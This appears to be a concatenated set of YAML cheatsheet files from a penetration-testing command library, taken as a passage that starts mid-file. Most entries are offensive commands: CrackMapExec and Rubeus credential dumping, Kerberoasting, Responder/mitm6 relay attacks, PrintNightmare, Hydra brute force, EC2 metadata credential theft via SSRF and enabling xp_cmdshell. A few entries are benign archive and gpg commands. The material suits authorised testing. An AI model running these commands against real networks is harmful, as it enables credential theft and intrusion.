109 | 110 | ```bash 111 | cme smb -u -p '' --local-auth --wdigest enable 112 | ``` 113 | 114 | cme - loggout user 115 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #warning/modify_target #cat/POSTEXPLOIT 116 | 117 | Can be usefull after enable wdigest to force user to reconnect 118 | 119 | ```bash 120 | cme smb -u -p '' -x 'quser' 121 | cme smb -u -p '' -x 'logoff ' --no-output 122 | ``` 123 | 124 | cme - local-auth 125 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/ATTACK/CONNECT 126 | 127 | ```bash 128 | cme smb -u -p --local-auth 129 | ``` 130 | 131 | cme - local-auth with hash 132 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/ATTACK/CONNECT 133 | 134 | ```bash 135 | cme smb -u -H --local-auth 136 | ``` 137 | 138 | cme - domain auth 139 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/ATTACK/CONNECT 140 | 141 | ```bash 142 | cme smb -u -p -d 143 | ``` 144 | 145 | cme - kerberos auth 146 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/ATTACK/CONNECT 147 | 148 | Previously import ticket : 149 | export KRB5CCNAME=/tmp/ticket.ccache 150 | 151 | ```bash 152 | cme smb --kerberos 153 | ``` 154 | 155 | cme - Dump SAM 156 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/POSTEXPLOIT/CREDS_RECOVER 157 | 158 | Dump SAM hashes using methods from secretsdump.py 159 | You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account 160 | 161 | ```bash 162 | cme smb -u -p -d --sam 163 | ``` 164 | 165 | cme - Dump LSA 166 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/POSTEXPLOIT/CREDS_RECOVER 167 | 168 | Dump LSA secrets using methods from secretsdump.py 169 | Requires Domain Admin or Local Admin Priviledges on target Domain Controller 170 | 171 | ```bash 172 | cme smb -u -p -d --lsa 173 | ``` 174 | 175 | cme - dump ntds.dit 176 | plateform/linux #target/remote 
#port/445 #port/139 #protocol/smb #cat/POSTEXPLOIT/CREDS_RECOVER 177 | 178 | Dump the NTDS.dit from target DC using methods from secretsdump.py 179 | Requires Domain Admin or Local Admin Priviledges on target Domain Controller 180 | 181 | ```bash 182 | cme smb -u -p -d --ntds 183 | ``` 184 | 185 | cme - dump lsass 186 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/POSTEXPLOIT/CREDS_RECOVER 187 | 188 | ```bash 189 | cme smb -u -p -d -M lsassy 190 | ``` 191 | 192 | cme - dump lsass - with bloodhond update 193 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/POSTEXPLOIT/CREDS_RECOVER 194 | 195 | ```bash 196 | cme smb --local-auth -u -H -M lsassy -o BLOODHOUND=True NEO4JUSER= NEO4JPASS= 197 | ``` 198 | 199 | cme - password spray (user=password) 200 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/ATTACK/BRUTEFORCE-SPRAY 201 | 202 | ```bash 203 | cme smb -u -p --no-bruteforce --continue-on-success 204 | ``` 205 | 206 | cme - password spray multiple test 207 | plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/BRUTEFORCE-SPRAY #tag/warning 208 | 209 | (carrefull on lockout) 210 | 211 | ```bash 212 | cme smb -u -p --continue-on-success 213 | ``` 214 | 215 | cme - put file 216 | plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/FILE_TRANSFERT 217 | Send a local file to the remote target 218 | 219 | ```bash 220 | cme smb -u -p --put-file 221 | ``` 222 | 223 | cme - get file 224 | plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/FILE_TRANSFERT 225 | Send a local file to the remote target 226 | 227 | ```bash 228 | cme smb -u -p --get-file 229 | ``` 230 | 231 | cme - ASREPRoast enum without authentication 232 | plateform/linux #target/remote #port/389 #port/639 #protocol/ldap #cat/RECON 233 | 234 | User can be a wordlist too (user.txt) 235 | Hashcat format -m 18200 236 | 237 | ```bash 238 | cme ldap -u -p '' --asreproast ASREProastables.txt --kdcHost 239 | 
``` 240 | 241 | cme - ASREPRoast enum with authentication 242 | plateform/linux #target/remote #port/389 #port/639 #protocol/ldap #cat/RECON 243 | 244 | Hashcat format -m 18200 245 | 246 | ```bash 247 | cme ldap -u -p '' --asreproast ASREProastables.txt --kdcHost 248 | ``` 249 | 250 | cme - Kerberoasting 251 | plateform/linux #target/remote #port/389 #port/639 #protocol/ldap #cat/RECON 252 | 253 | Hashcat format -m 13100 254 | 255 | ```bash 256 | cme ldap -u -p '' --kerberoasting kerberoastables.txt --kdcHost 257 | ``` 258 | 259 | cme - Unconstrained delegation 260 | plateform/linux #target/remote #port/389 #port/639 #protocol/ldap #cat/RECON 261 | 262 | List of all computers et users with the flag TRUSTED_FOR_DELEGATION 263 | 264 | ```bash 265 | cme ldap -u -p '' --trusted-for-delegation 266 | ``` 267 | 268 | cme - winrm-auth 269 | plateform/linux #target/remote #port/5985 #port/5986 #protocol/winrm #cat/ATTACK/CONNECT 270 | 271 | ```bash 272 | cme winrm -u -p 273 | ``` 274 | 275 | cme - mssql password spray 276 | plateform/linux #target/remote #port/1433 #protocol/mssql #cat/ATTACK/BRUTEFORCE-SPRAY 277 | 278 | ```bash 279 | cme mssql -u -p --no-bruteforce 280 | ``` 281 | 282 | cme - mssql execute query 283 | plateform/linux #target/remote #port/1433 #protocol/mssql #cat/ATTACK/EXPLOIT 284 | 285 | ```bash 286 | cme mssql -u -p '' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;' 287 | ``` 288 | 289 | cme - mssql execute command 290 | plateform/linux #target/remote #port/1433 #protocol/mssql #cat/ATTACK/EXPLOIT 291 | 292 | ```bash 293 | cme mssql -u -p '' --local-auth -x 294 | ``` 295 | 296 | = ip: 192.168.1.0/24 297 | -------------------------------------------------------------------------------- /files/Active_directory/kerberos.yaml: -------------------------------------------------------------------------------- 1 | name: kerberos 2 | tags: [kerberos] 3 | data: | 4 | 5 | Kerbrute usersenum 6 | plateform/linux #target/remote #port/88 #protocol/kerberos 
#cat/ATTACK/BRUTEFORCE-SPRAY 7 | ``` 8 | ./kerbrute_linux_amd64 userenum -d --dc 9 | ``` 10 | 11 | kerberos enum users 12 | plateform/linux #target/remote #port/88 #protocol/kerberos #cat/RECON 13 | ``` 14 | nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm=''" 15 | ``` 16 | 17 | kerberos enum users (with user list) 18 | plateform/linux #target/remote #port/88 #protocol/kerberos #cat/ATTACK/BRUTEFORCE-SPRAY 19 | ``` 20 | nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='',userdb=" 21 | ``` 22 | 23 | kerberos ms14-068 24 | plateform/linux #target/remote #port/88 #protocol/kerberos #cat/ATTACK/EXPLOIT 25 | ``` 26 | msfconsole -x "use auxiliary/admin/kerberos/ms14_068_kerberos_checksum" 27 | ``` 28 | 29 | exploit gpp - group policy preference (ms14-025) 30 | plateform/linux #target/remote #port/88 #protocol/kerberos #cat/RECON 31 | ``` 32 | msfconsole -x "use scanner/smb/smb_enum_gpp" 33 | ``` 34 | -------------------------------------------------------------------------------- /files/Active_directory/laps.yaml: -------------------------------------------------------------------------------- 1 | name: LAPS 2 | tags: [laps, password] 3 | data: | 4 | 5 | get laps passwords 6 | plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 7 | ``` 8 | Get-LAPSPasswords -DomainController -Credential \ | Format-Table -AutoSize 9 | ``` 10 | 11 | get all machine passwords 12 | plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 13 | ``` 14 | foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}} 15 | ``` 16 | -------------------------------------------------------------------------------- /files/Active_directory/lsassy.yaml: -------------------------------------------------------------------------------- 1 | name: Lsassy 2 | tags: [Lsassybasic usage with password (ip or range)] 3 
| data: | 4 | plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 5 | ``` 6 | lsassy -d -u -p 7 | ``` 8 | 9 | Lsassy basic usage with hash (ip or range) 10 | plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 11 | ``` 12 | lsassy -v -u -H 13 | ``` 14 | 15 | Lsassy basic usage with kerberos (ip or range) 16 | plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 17 | ``` 18 | lsassy -d -u -k 19 | ``` 20 | -------------------------------------------------------------------------------- /files/Active_directory/mitm6.yaml: -------------------------------------------------------------------------------- 1 | name: mitm6 2 | tags: [mitm6, ipv6, man in the middle] 3 | data: | 4 | 5 | run mitm6 (to run with impacket-ntlmrelayx) 6 | plateform/linux #target/remote #cat/ATTACK/MITM 7 | ``` 8 | mitm6 -d 9 | ``` 10 | -------------------------------------------------------------------------------- /files/Active_directory/responder.yaml: -------------------------------------------------------------------------------- 1 | name: responder 2 | tags: [responder, LLMNR, NBT-NS, Poisoning, man in the middle] 3 | data: | 4 | 5 | responder launch 6 | plateform/linux #target/remote #cat/ATTACK/MITM 7 | ``` 8 | responder –I eth0 9 | ``` 10 | 11 | responder launch - analyze mode (no poisoning) 12 | plateform/linux #target/remote #cat/RECON 13 | ``` 14 | responder –I eth0 -A 15 | ``` 16 | 17 | responder launch with wpad file 18 | plateform/linux #target/remote #cat/ATTACK/MITM 19 | ``` 20 | responder -I eth0 --wpad 21 | ``` 22 | 23 | responder http on 24 | plateform/linux #target/local #cat/UTILS 25 | ``` 26 | sed -i 's/HTTP = Off/HTTP = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP =' 27 | ``` 28 | 29 | responder http off 30 | plateform/linux #target/local #cat/UTILS 31 | ``` 32 | sed -i 's/HTTP = On/HTTP = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep 
--color=never 'HTTP =' 33 | ``` 34 | 35 | responder smb on 36 | plateform/linux #target/local #cat/UTILS 37 | ``` 38 | sed -i 's/SMB = Off/SMB = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB =' 39 | ``` 40 | 41 | responder smb off 42 | plateform/linux #target/local #cat/UTILS 43 | ``` 44 | sed -i 's/SMB = On/SMB = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB =' 45 | ``` 46 | 47 | multirelay attack - user filtered (previous disable HTTP and SMB in Responder.conf) 48 | plateform/linux #target/serve #cat/ATTACK/MITM 49 | ``` 50 | multirelay -t -u 51 | ``` 52 | 53 | multirelay attack - all user (previous disable HTTP and SMB in Responder.conf) 54 | plateform/linux #target/serve #cat/ATTACK/MITM 55 | ``` 56 | multirelay -t -u ALL 57 | ``` 58 | 59 | runfinger - Responder-related utility which will finger a single IP address or an IP subnet and will reveal if a target requires SMB Signing or not. 
60 | plateform/linux #target/remote #cat/RECON 61 | ``` 62 | runfinger -i 63 | ``` 64 | -------------------------------------------------------------------------------- /files/Active_directory/rpcclient.yaml: -------------------------------------------------------------------------------- 1 | name: rpcclient 2 | tags: [rpcclient, rpc, windows] 3 | data: | 4 | 5 | rpcclient - enumdomusers 6 | plateform/linux #target/remote #cat/RECON 7 | ``` 8 | rpcclient -U "%" -c "enumdomusers;quit" 9 | ``` 10 | 11 | rpcclient - srvinfo 12 | plateform/linux #target/remote #cat/RECON 13 | ``` 14 | rpcclient -U "%" -c "srvinfo;quit" 15 | ``` 16 | 17 | rpcclient - get user sid 18 | plateform/linux #target/remote #cat/RECON 19 | ``` 20 | rpcclient -c "lookupnales ; wmic useraccount get name,sid; quit" 21 | ``` 22 | 23 | rpcclient - querydominfo 24 | plateform/linux #target/remote #cat/RECON 25 | ``` 26 | rpcclient -U "%" -c "querydominfo;quit" 27 | ``` 28 | 29 | rpcclient - getdompwinfo (password policy) 30 | plateform/linux #target/remote #cat/RECON 31 | ``` 32 | rpcclient -U "%" -c "getdompwinfo;quit" 33 | ``` 34 | 35 | rpcclient - netshareenum (password policy) 36 | plateform/linux #target/remote #cat/RECON 37 | ``` 38 | rpcclient -U "%" -c "netshareenum;quit" 39 | ``` 40 | 41 | Trying all username as password from list of users 42 | plateform/linux #target/remote #cat/ATTACK/BRUTEFORCE-SPRAY 43 | ``` 44 | for u in `cat `; do echo -n "user: $u " && rpcclient -U "$u%$u" -c "getusername;quit" ; done 45 | ``` 46 | 47 | rpcclient - enum (Enum commands list) 48 | plateform/linux #target/remote #cat/RECON 49 | ``` 50 | rpcclient -U "%" -c "enum;quit" 51 | ``` 52 | 53 | rpcclient - enumdomains (Current domain) 54 | plateform/linux #target/remote #cat/RECON 55 | ``` 56 | rpcclient -U "%" -c "enumdomains;quit" 57 | ``` 58 | 59 | rpcclient - enumdomgroups (Enum Domain groups) 60 | plateform/linux #target/remote #cat/RECON 61 | ``` 62 | rpcclient -U "%" -c "enumdomgroups;quit" 63 | ``` 64 | 
65 | rpcclient - querygroup (Enum Group Information) 66 | plateform/linux #target/remote #cat/RECON 67 | ``` 68 | rpcclient -U "%" -c "querygroup ;quit" 69 | ``` 70 | 71 | rpcclient - querygroupmem (Enum Group Membership) 72 | plateform/linux #target/remote #cat/RECON 73 | ``` 74 | rpcclient -U "%" -c "querygroupmem ;quit" 75 | ``` 76 | 77 | rpcclient - queryuser (Enumerate specific User/ computer information by RID) 78 | plateform/linux #target/remote #cat/RECON 79 | ``` 80 | rpcclient -U "%" -c "queryuser ;quit" 81 | ``` 82 | 83 | rpcclient - getusrdompwinfo (User password policies) 84 | plateform/linux #target/remote #cat/RECON 85 | ``` 86 | rpcclient -U "%" -c "getusrdompwinfo ;quit" 87 | ``` 88 | 89 | rpcclient - lsaenumsid (Local Users LSA Enum SID) 90 | plateform/linux #target/remote #cat/RECON 91 | ``` 92 | rpcclient -U "%" -c "lsaenumsid;quit" 93 | ``` 94 | 95 | rpcclient - lookupsid (Local Users Lookup SID) 96 | plateform/linux #target/remote #cat/RECON 97 | ``` 98 | rpcclient -U "%" -c "lookupsid ;quit" 99 | ``` 100 | 101 | rpcclient - setuserinfo2 (Reset AD user password) 102 | plateform/linux #target/remote #cat/EXPLOIT 103 | ``` 104 | rpcclient -U "%" -c "setuserinfo2 23 '';quit" 105 | ``` 106 | 107 | -------------------------------------------------------------------------------- /files/Active_directory/rubeus.yaml: -------------------------------------------------------------------------------- 1 | name: rubeus 2 | tags: [ad, windows, rubeus] 3 | data: | 4 | 5 | # inject ticket from file 6 | plateform/windows #target/local #cat/UTILS 7 | ```cmd 8 | .\Rubeus.exe ptt /ticket: 9 | ``` 10 | 11 | inject ticket from b64 blob 12 | plateform/windows #target/local #cat/UTILS 13 | ```cmd 14 | .\Rubeus.exe ptt /ticket: 15 | ``` 16 | 17 | # check ASPREPRoast for all users in current domain 18 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 19 | ```cmd 20 | .\Rubeus.exe asreproast /format: /outfile: 21 | ``` 22 | 23 | ASREPRoast specific user 24 | 
plateform/windows #target/remote #cat/ATTACK/EXPLOIT 25 | ```cmd 26 | .\Rubeus.exe asreproast /user: /domain: /format: /outfile: 27 | ``` 28 | 29 | # kerberoasting - current domain 30 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 31 | ```cmd 32 | .\Rubeus.exe kerberoast /outfile: 33 | ``` 34 | 35 | Kerberoasting and outputing on a file with a spesific format 36 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 37 | ```cmd 38 | .\Rubeus.exe kerberoast /outfile: /domain: 39 | ``` 40 | 41 | Kerberoasting whle being "OPSEC" safe, essentially while not try to roast AES enabled accounts 42 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 43 | ```cmd 44 | .\Rubeus.exe kerberoast /outfile: /domain: /rc4opsec 45 | ``` 46 | 47 | Kerberoast AES enabled accounts 48 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 49 | ```cmd 50 | .\Rubeus.exe kerberoast /outfile: /domain: /aes 51 | ``` 52 | 53 | Kerberoast specific user account 54 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 55 | ```cmd 56 | .\Rubeus.exe kerberoast /outfile: /domain: /user: /simple 57 | ``` 58 | 59 | get hash 60 | plateform/windows #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 61 | ```cmd 62 | .\Rubeus.exe hash /user: /domain: /password: 63 | ``` 64 | 65 | dump - will dump any relevant cached TGS ticket’s stored 66 | plateform/windows #target/local #cat/POSTEXPLOIT/CREDS_RECOVER 67 | ``` 68 | .\Rubeus.exe dump 69 | ``` 70 | 71 | ask and inject ticket 72 | plateform/windows #target/remote #cat/ATTACK/CONNECT 73 | ``` 74 | .\Rubeus.exe asktgt /user: /domain: /rc4: /ptt 75 | ``` 76 | 77 | S4U - with ticket - Contrained delegation 78 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 79 | ``` 80 | .\Rubeus.exe s4u /ticket: /impersonateuser: /msdsspn:ldap/ /altservice:cifs /ptt 81 | ``` 82 | 83 | S4U - with hash - Constrained delegation 84 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 85 | ``` 86 | .\Rubeus.exe s4u /user: /rc4: /impersonateuser: /msdsspn:ldap/ 
/altservice:cifs /domain: /ptt 87 | ``` 88 | 89 | get rc4 of machine with the password 90 | plateform/windows #target/local #cat/POSTEXPLOIT/CREDS_RECOVER 91 | ``` 92 | .\Rubeus.exe hash /password: 93 | ``` 94 | 95 | S4U - Resource based contrained delegation 96 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 97 | ``` 98 | .\Rubeus.exe s4u /user: /rc4: /impersonateuser: /msdsspn:cifs/ /domain: /ptt 99 | ``` 100 | 101 | = ticket : c:\Temp\ticket.kirbi 102 | = domain_fqdn : MYDC.mydomain.local 103 | = domain_name : mydomain.local 104 | = AS_REP_response_format : hashcat 105 | -------------------------------------------------------------------------------- /files/Active_directory/spooler_service_abuse.yaml: -------------------------------------------------------------------------------- 1 | name: Printerbug 2 | tags: [printerbug, Active directory] 3 | data: | 4 | 5 | Finding Spooler services listening 6 | plateform/linux #target/remote #cat/RECON 7 | ``` 8 | rpcdump.py /:''@ | grep MS-RPRN 9 | ``` 10 | 11 | Finding Spooler services anonymous 12 | plateform/linux #target/remote #cat/RECON 13 | ``` 14 | rpcdump.py | grep -A 6 MS-RPRN 15 | ``` 16 | 17 | dementor 18 | plateform/linux #target/remote #cat/ATTACK/EXPLOIT 19 | https://github.com/NotMedic/NetNTLMtoSilverTicket 20 | 21 | ``` 22 | dementor.py -d -u -p 23 | ``` 24 | 25 | printerbug 26 | plateform/linux #target/remote #cat/ATTACK/EXPLOIT 27 | https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py 28 | 29 | ``` 30 | printerbug.py '/:'@ 31 | ``` 32 | 33 | ntlmrelayx add computer 34 | plateform/linux #target/remote #cat/ATTACK/MITM 35 | ``` 36 | ntlmrelayx -t ldaps:// -smb2support --remove-mic --add-computer --delegate-access 37 | ``` 38 | 39 | use silver ticket 40 | plateform/linux #target/remote #cat/ATTACK/EXPLOIT 41 | ``` 42 | getST.py -spn host/ -impersonate -dc-ip '/$:' 43 | ``` 44 | 45 | secret dump with kerberos 46 | plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 47 | ``` 48 | 
secretsdump -k 49 | ``` 50 | 51 | PrintNightmare 52 | plateform/linux #target/remote #cat/ATTACK/EXPLOIT 53 | https://github.com/cube0x0/CVE-2021-1675 54 | 55 | - windows server 2019 56 | container_info['DriverInfo']['Level2']['pDriverPath'] = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\x00" 57 | - windows server 2016 58 | container_info['DriverInfo']['Level2']['pDriverPath'] = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_db4f0d0030e708f4\\Amd64\\UNIDRV.DLL\x00" 59 | 60 | Need a real smb server (not work with the impacket server) 61 | 62 | ``` 63 | CVE-2021-1675.py /:@ '\\\\.dll' 64 | ``` 65 | 66 | 67 | 68 | = user : anonymous 69 | = pass : anonymous 70 | = computer_name : arsenal 71 | = dc : DC01.domain.local 72 | = dc1 : DC01.domain.local 73 | = dc2 : DC02.domain.local 74 | = computer_password : 123soleil 75 | 76 | -------------------------------------------------------------------------------- /files/Archive/7z.yaml: -------------------------------------------------------------------------------- 1 | name: 7z 2 | tags: [archive] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/UTILS 6 | 7 | 7z create archive with password 8 | ``` 9 | 7z a .7z -p 10 | ``` 11 | -------------------------------------------------------------------------------- /files/Archive/gzip.yaml: -------------------------------------------------------------------------------- 1 | name: gzip 2 | tags: [archive] 3 | data: | 4 | plateform/linux #target/local #cat/UTILS 5 | 6 | Compress file and appends .gz to its name 7 | ``` 8 | gzip 9 | ``` 10 | 11 | Decompress compressed file 12 | ``` 13 | gzip -d 14 | ``` 15 | -------------------------------------------------------------------------------- /files/Archive/rar.yaml: -------------------------------------------------------------------------------- 1 | name: rar 2 | tags: [archive] 3 | data: | 4 | plateform/linux #target/local #cat/UTILS 5 | 6 | Compress 
dir to rar file 7 | ``` 8 | rar a 9 | ``` 10 | 11 | Decompress rar file 12 | ``` 13 | unrar x .rar 14 | ``` 15 | -------------------------------------------------------------------------------- /files/Archive/tar.yaml: -------------------------------------------------------------------------------- 1 | name: tar 2 | tags: [archive] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/UTILS 6 | 7 | Create a tar containing files 8 | ``` 9 | tar cf .tar 10 | ``` 11 | 12 | Extract the files from a tar 13 | ``` 14 | tar xf 15 | ``` 16 | 17 | Create a tar with Gzip compression 18 | ``` 19 | tar czf .tar.gz 20 | ``` 21 | 22 | Extract a tar using Gzip 23 | ``` 24 | tar xzf 25 | ``` 26 | -------------------------------------------------------------------------------- /files/Archive/zip.yaml: -------------------------------------------------------------------------------- 1 | name: zip 2 | tags: [archive, compress] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/UTILS 6 | 7 | create zip file 8 | ``` 9 | zip .zip 10 | ``` 11 | 12 | zip all the files of current directory 13 | ``` 14 | zip .zip * 15 | ``` 16 | 17 | zip folder 18 | ``` 19 | zip -r .zip 20 | ``` 21 | 22 | add file to a zip archive 23 | ``` 24 | zip -u .zip 25 | ``` 26 | 27 | view zip content 28 | ``` 29 | zipinfo .zip 30 | ``` 31 | 32 | create zip file with symlink (usefull for path traversal) 33 | ``` 34 | zip --symlinks .zip 35 | ``` 36 | 37 | list detailed zip file content 38 | ``` 39 | unzip -Z .zip 40 | ``` 41 | 42 | unzip file 43 | ``` 44 | unzip .zip 45 | ``` 46 | 47 | unzip file to directory 48 | ``` 49 | unzip .zip -d 50 | ``` 51 | -------------------------------------------------------------------------------- /files/BruteForce/hydra.yaml: -------------------------------------------------------------------------------- 1 | name: Hydra 2 | tags: [bruteforce, access] 3 | data: | 4 | 5 | Hydra - ssh - userlist and password list - 22 6 | plateform/linux #target/remote #protocol/ssh #port/22 
#cat/ATTACK/BRUTEFORCE-SPRAY 7 | 8 | ```bash 9 | hydra -L -P ssh 10 | ``` 11 | 12 | Hydra - ssh - user and password - 22 13 | plateform/linux #target/remote #protocol/ssh #port/22 #cat/ATTACK/BRUTEFORCE-SPRAY 14 | 15 | ```bash 16 | hydra -l -p ssh 17 | ``` 18 | 19 | Hydra - ssh - user=password - 22 20 | plateform/linux #target/remote #protocol/ssh #port/22 #cat/ATTACK/BRUTEFORCE-SPRAY 21 | 22 | ``` 23 | hydra -L -e s ssh 24 | ``` 25 | 26 | Hydra - ssh - null password - 22 27 | plateform/linux #target/remote #protocol/ssh #port/22 #cat/ATTACK/BRUTEFORCE-SPRAY 28 | 29 | ``` 30 | hydra -l -e n ssh 31 | ``` 32 | 33 | Hydra - ssh - password=reverseuser - 22 34 | plateform/linux #target/remote #protocol/ssh #port/22 #cat/ATTACK/BRUTEFORCE-SPRAY 35 | 36 | ``` 37 | hydra -L -e r ssh 38 | ``` 39 | 40 | Hydra - ssh - file "login:pass" format - 22 41 | plateform/linux #target/remote #protocol/ssh #port/22 #cat/ATTACK/BRUTEFORCE-SPRAY 42 | 43 | ``` 44 | hydra -C ssh 45 | ``` 46 | 47 | Hydra - ftp - 21 48 | protocol/ftp #port/21 #plateform/linux #target/remote #cat/ATTACK/BRUTEFORCE-SPRAY 49 | 50 | ``` 51 | hydra -L -P ftp 52 | ``` 53 | 54 | Hydra - smb - 445 55 | protocol/smb #port/445 #plateform/linux #target/remote #cat/ATTACK/BRUTEFORCE-SPRAY 56 | 57 | ``` 58 | hydra -L -P smb 59 | ``` 60 | 61 | Hydra - mysql - 3306 62 | protocol/mysql #port/3306 #plateform/linux #target/remote #cat/ATTACK/BRUTEFORCE-SPRAY 63 | 64 | ``` 65 | hydra -L -P mysql 66 | ``` 67 | 68 | Hydra - vnc - 5900 69 | protocol/vnc #port/5900 #plateform/linux #target/remote #cat/ATTACK/BRUTEFORCE-SPRAY 70 | 71 | ``` 72 | hydra -L -P vnc 73 | ``` 74 | 75 | Hydra - postgres - 5432 76 | protocol/postgres #port/5432 #plateform/linux #target/remote #cat/ATTACK/BRUTEFORCE-SPRAY 77 | 78 | ``` 79 | hydra -L -P postgres 80 | ``` 81 | 82 | Hydra - telnet - 23 83 | protocol/telnet #port/23 #plateform/linux #target/remote #cat/ATTACK/BRUTEFORCE-SPRAY 84 | 85 | ``` 86 | hydra -L -P telnet 87 | ``` 88 | 89 | = userlist: 
users.txt 90 | = passlist: pass.txt 91 | -------------------------------------------------------------------------------- /files/BruteForce/wordlist/cewl.yaml: -------------------------------------------------------------------------------- 1 | name: cewl 2 | tags: [wordlist, bruteforce, dict] 3 | data: | 4 | 5 | cewl - wordlist creation 6 | plateform/linux #target/remote #cat/RECON 7 | Build a custom wordlist scraping words from a website. 8 | 9 | ```bash 10 | cewl -w -d -m 11 | ``` 12 | -------------------------------------------------------------------------------- /files/BruteForce/wordlist/crunch.yaml: -------------------------------------------------------------------------------- 1 | name: 2 | tags: [] 3 | data: | 4 | % wordlist, bruteforce, dict 5 | 6 | crunch - generate wordlist hex 7 | plateform/linux #target/local #cat/UTILS 8 | ```bash 9 | crunch 0123456789ABCDEF -o 10 | ``` 11 | 12 | crunch - generate wordlist charset 13 | plateform/linux #target/local #cat/UTILS 14 | ```bash 15 | crunch -f /usr/share/crunch/charset.lst -o 16 | ``` 17 | 18 | crunch - generate wordlist Upper(,) lower(@)x3 numeric(%)x3 special(^)x1 19 | plateform/linux #target/local #cat/UTILS 20 | - @ will insert lower case characters 21 | - , will insert upper case characters 22 | - % will insert numbers 23 | - ^ will insert symbols 24 | 25 | ```bash 26 | crunch 8 8 -t -o 27 | ``` 28 | 29 | crunch - generate wordlist contain "password", 2 numbers and 1 special char 30 | plateform/linux #target/local #cat/UTILS 31 | ```bash 32 | crunch 8 8 -t password%%^ -o 33 | ``` 34 | -------------------------------------------------------------------------------- /files/Cloud/aws.yaml: -------------------------------------------------------------------------------- 1 | name: AWS 2 | tags: [aws] 3 | data: | 4 | 5 | SSRF in EC2 - List roles 6 | plateform/linux #target/remote #protocol/http #port/80 #cat/RECON 7 | ``` 8 | curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ 9 | ``` 10 
| 11 | SSRF in EC2 - Dump roles 12 | plateform/linux #target/remote #protocol/http #port/80 #cat/RECON 13 | ``` 14 | curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ 15 | ``` 16 | 17 | -------------------------------------------------------------------------------- /files/Crypto/gpg.yaml: -------------------------------------------------------------------------------- 1 | name: gpg 2 | tags: [gpg] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/UTILS 6 | 7 | gpg version 8 | ``` 9 | gpg --version 10 | ``` 11 | 12 | gpg generate key 13 | ``` 14 | gpg --gen-key 15 | ``` 16 | 17 | list keys 18 | ``` 19 | gpg --list-keys 20 | ``` 21 | 22 | distribute public key to key server 23 | ``` 24 | gpg --keyserver --send-keys 25 | ``` 26 | 27 | export public key 28 | ``` 29 | gpg --output --export 30 | ``` 31 | 32 | import public key 33 | ``` 34 | gpg --import 35 | ``` 36 | 37 | encrypt document 38 | ``` 39 | gpg --output --encrypt --recipient 40 | ``` 41 | 42 | decrypt document 43 | ``` 44 | gpg --output --decrypt 45 | ``` 46 | 47 | make a signature 48 | ``` 49 | gpg --output --sign 50 | ``` 51 | 52 | verify signature 53 | ``` 54 | gpg --output --decrypt 55 | ``` 56 | 57 | clearsign documents 58 | ``` 59 | gpg --clearsign 60 | ``` 61 | 62 | detach signature 63 | ``` 64 | gpg --output --detach-sig 65 | ``` 66 | -------------------------------------------------------------------------------- /files/Database/mssql-exec-xpcmdshell.yml: -------------------------------------------------------------------------------- 1 | name: mssql-exec 2 | tags: [mssql,xpcmdshell,exec] 3 | data: | 4 | plateform/windows #target/local 5 | 6 | SQL Server xpcmdshell 7 | 8 | ``` 9 | EXEC sp_configure 'show advanced option', 1 10 | EXEC sp_configure reconfigure 11 | EXEC sp_configure 'xp_cmdshell', 1 12 | EXEC sp_configure reconfigure 13 | EXEC master.dbo.xp_cmdshell 'whoami' 14 | ``` -------------------------------------------------------------------------------- 
